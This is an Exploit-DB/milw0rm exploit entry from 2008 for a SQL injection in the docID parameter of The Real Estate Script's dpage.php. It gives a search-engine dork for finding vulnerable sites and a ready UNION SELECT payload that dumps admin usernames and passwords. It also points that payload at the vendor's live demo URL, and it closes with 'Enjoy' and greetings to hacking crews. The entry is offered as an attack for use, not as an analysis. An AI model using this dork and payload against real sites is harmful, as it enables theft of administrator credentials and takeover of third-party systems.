The Real Estate Script - 'docID' SQL Injection

EDB-ID:

5610


Platform:

PHP

Published:

2008-05-13

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
########## Remote SQL Injection Vulnerability  ##############
                     Therealestatescript    [ dpage.php ]
#################################################                             
 
[$] Author : HaCkeR_EgY
 
[$] c0nTaCT : hacker_egy@hotmail.com
 
[$] DownlOad : www.therealestatescript.com
 
[$] Price :  The Real Estate Script is on sale for $99.95 $59.95 until June 1st.
====================================================
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[$] Dork :    inurl:dpage.php?docID
 
[$] ExPLo!T : http://www.example.com/dpage.php?docID=-1+union+select+1,2,concat_ws(0x3a3a,Username,Password)+from+admin
 
[$] L!ve Demo : http://www.therealestatescript.com/demo/dpage.php?docID=-1+union+select+1,2,concat_ws(0x3a3a,Username,Password)+from+admin
 
--Note-- : Enjoy !!! .............  (:
 
====================================================
 
[$] Thanx : MY Brotha and MY Master " Abo Mohamed "
 
[$] Greetz : F!resell , Mohamed el Arab ,Mr.SQL , DaRk MaStEr , H-T Team ,Gold_M , Stack-Terrorist , Jiki Team

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                        

# milw0rm.com [2008-05-13]